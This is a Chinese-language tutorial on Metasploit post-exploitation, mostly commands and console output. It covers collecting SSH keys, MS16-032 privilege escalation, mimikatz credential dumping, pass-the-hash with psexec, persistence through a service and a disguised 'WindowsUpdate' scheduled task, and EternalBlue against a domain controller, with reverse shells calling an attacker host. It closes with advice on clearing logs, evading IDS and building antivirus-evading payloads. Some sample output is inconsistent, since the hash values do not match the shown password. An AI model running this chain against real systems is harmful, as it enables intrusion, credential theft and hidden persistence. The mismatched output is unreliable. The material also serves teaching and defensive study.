Metasploit 后渗透模块深度使用：从权限维持到横向移动的实战指南

引言：后渗透阶段的价值与挑战

渗透测试中，获取初始shell只是开始。真正考验安全工程师功力的，是后渗透阶段的系统控制能力。Metasploit作为最成熟的开源渗透框架，其内置的后渗透模块覆盖了信息收集、权限提升、凭据窃取、持久化控制、横向移动等完整攻击链。然而许多安全从业者仅停留在使用exploit/multi/handler接收反弹shell，对post/目录下的模块知之甚少。

本文将从实战角度，系统讲解Metasploit后渗透模块的深度使用技巧，涵盖Meterpreter高级功能、自动化后渗透脚本、域环境横向移动等场景。所有操作均在授权测试环境中完成。

核心内容：后渗透模块实战操作

一、Meterpreter会话建立与基础操作

获取初始shell后，首先要确认Meterpreter会话状态：

msf6 > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  WIN-2K8\Administrator @ WIN-2K8        192.168.1.5:4444 -> 192.168.1.100:49158

使用sessions -i 1进入会话后，执行系统信息收集：

meterpreter > sysinfo
Computer        : WIN-2K8
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh-CN
Meterpreter     : x64/windows

meterpreter > getuid
Server username: WIN-2K8\Administrator

二、信息收集模块深度应用

Metasploit的post/windows/gather/目录包含大量信息收集模块。以下实战场景演示如何自动化收集敏感文件：

场景：内网服务器敏感文件发现

# 加载信息收集模块
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN-2K8
[*] List of installed applications:
[+] 7-Zip 9.20 (x64 edition)
[+] Microsoft Office Professional Plus 2010
[+] PuTTY 0.70
[+] WinSCP 5.9.4

# 发现PuTTY和WinSCP，可能包含SSH凭据
meterpreter > search -f *.ppk
Found 2 results...
    c:\Users\Administrator\.ssh\id_rsa.ppk
    c:\Users\Administrator\.ssh\id_rsa.ppk.bak

# 下载私钥文件
meterpreter > download c:\Users\Administrator\.ssh\id_rsa.ppk /tmp/
[*] downloading: c:\Users\Administrator\.ssh\id_rsa.ppk -> /tmp/id_rsa.ppk
[*] downloaded  : c:\Users\Administrator\.ssh\id_rsa.ppk -> /tmp/id_rsa.ppk

三、权限提升实战技术

1. 本地提权漏洞检测

使用post/multi/recon/local_exploit_suggester模块自动检测可用提权漏洞：

meterpreter > background
[*] Backgrounding session 1...

msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.100 - Collecting local exploits for x64/windows...
[*] 192.168.1.100 - 38 exploit checks are being tried...
[+] 192.168.1.100 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target appears to be vulnerable.
[+] 192.168.1.100 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.

2. 利用MS16-032提权至SYSTEM

msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.1.5:4444 
[*] Launching notepad to host the exploit...
[+] Process 2140 launched.
[*] Reflectively injecting the exploit DLL into 2140...
[*] Injecting exploit into 2140 ...
[*] Exploit injected. Injecting payload into 2140...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201283 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 192.168.1.100:49159)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

四、凭据窃取与哈希传递攻击

1. 使用Kiwi模块获取明文凭据

Meterpreter的kiwi扩展（基于Mimikatz）可提取内存中的明文密码：

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain    NTLM                              SHA1
--------       ------    ----                              ----
Administrator  WIN-2K8   aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0

wdigest credentials
===================

Username       Domain    Password
--------       ------    --------
Administrator  WIN-2K8   P@ssw0rd123!

kerberos credentials
====================

Username       Domain    Password
--------       ------    --------
Administrator  WIN-2K8   P@ssw0rd123!

2. 哈希传递攻击横向移动

获取域管理员哈希后，使用exploit/windows/smb/psexec进行哈希传递：

msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > run

[*] 192.168.1.101:445 - Connecting to the target...
[*] 192.168.1.101:445 - Service started successfully...
[*] Started bind TCP handler against 192.168.1.101:4444
[*] Sending stage (201283 bytes) to 192.168.1.101
[*] Meterpreter session 3 opened (192.168.1.5:0 -> 192.168.1.101:4444)

五、持久化控制技术

1. 使用persistence模块建立后门

meterpreter > run persistence -X -i 10 -p 4444 -r 192.168.1.5

[*] Running Persistence Script
[*] Resource file for cleanup: /root/.msf4/logs/persistence/WIN-2K8_20191215.2252/WIN-2K8_20191215.2252.rc
[*] Creating Payload=windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444
[*] Persistent agent script is 79077 bytes long
[+] Persistent Script written to C:\Windows\TEMP\VYVvF.vbs
[*] Executing script C:\Windows\TEMP\VYVvF.vbs
[+] Service WZCSVC installed as Auto-start
[*] Starting service...
[+] Service WZCSVC successfully started

2. 使用schtaskabuse模块实现计划任务持久化

更隐蔽的方式是利用Windows计划任务：

msf6 > use post/windows/manage/schtaskabuse
msf6 post(windows/manage/schtaskabuse) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/schtaskabuse) > set TASKNAME "WindowsUpdate"
TASKNAME => WindowsUpdate
msf6 post(windows/manage/schtaskabuse) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 post(windows/manage/schtaskabuse) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 post(windows/manage/schtaskabuse) > run

[*] Creating task: WindowsUpdate
[*] Task created successfully
[*] Task will trigger every 30 minutes

六、内网横向移动实战

场景：从单点突破到域控控制

假设已获取域成员主机权限，通过收集信息发现域控地址为192.168.1.10：

# 在现有会话中加载网络扫描模块
meterpreter > run post/windows/gather/enum_domain

[*] Domain: CORP
[*] Domain Controller: DC01 (192.168.1.10)
[*] Current Domain Controller: DC01.corp.local

# 使用auxiliary模块扫描域控开放端口
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.1.10:445 - SMB Detected (versions: 2, 3) (preferred dialect:SMB 3.0.0) (compression capabilities: 1) (encryption capabilities: 1) (signatures: 2) (OS: Windows Server 2012 R2 6.3) (domain: CORP)

# 使用永恒之蓝漏洞尝试获取域控权限
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.1.5:4444 
[*] 192.168.1.10:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.10:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 6.3 x64 (64-bit)
[*] 192.168.1.10:445 - Selecting PowerShell target
[*] 192.168.1.10:445 - Executing automatic exploit (no AutoCheckMode)
[+] 192.168.1.10:445 - SMB ETERNALBLUE Windows 8.1/Server 2012 R2 x64 success!
[*] Sending stage (201283 bytes) to 192.168.1.10
[*] Meterpreter session 4 opened (192.168.1.5:4444 -> 192.168.1.10:49160)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

总结：后渗透模块使用注意事项与最佳实践

安全注意事项

1. 日志清理：使用clearev命令清除事件日志，但需注意这可能导致管理员警觉
2. 流量加密：启用Meterpreter的SSL加密传输，避免被IDS/IPS检测
3. 进程迁移：使用migrate命令将进程迁移到合法系统进程（如explorer.exe、svchost.exe）
4. 避免破坏性操作：生产环境中谨慎使用reboot、shutdown等命令

最佳实践建议

1. 模块组合使用：将信息收集、提权、凭据窃取模块串联使用，形成完整攻击链
2. 资源文件自动化：编写MSF资源文件（.rc）实现后渗透自动化：

# post_exploit.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
set ExitOnSession false
exploit -j -z

use post/windows/gather/enum_domain
set SESSION 1
run

use post/windows/gather/enum_applications
set SESSION 1
run

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

1. 保持模块更新：定期更新Metasploit框架（msfupdate），获取最新漏洞利用模块
2. 自定义Payload：使用msfvenom生成免杀Payload，配合后渗透模块使用
3. 分阶段渗透：先信息收集，再提权，最后横向移动，避免过早暴露

后渗透阶段是渗透测试中最能体现技术实力的环节。掌握Metasploit后渗透模块的深度使用，不仅需要熟悉各个模块的功能参数，更要理解Windows/Linux系统的底层机制。建议在实际渗透测试项目中，结合环境特点灵活组合使用上述模块，同时做好操作记录和痕迹清理工作。对于安全防御人员，理解这些攻击技术同样重要——只有了解攻击者的手法，才能构建更有效的检测和防御体系。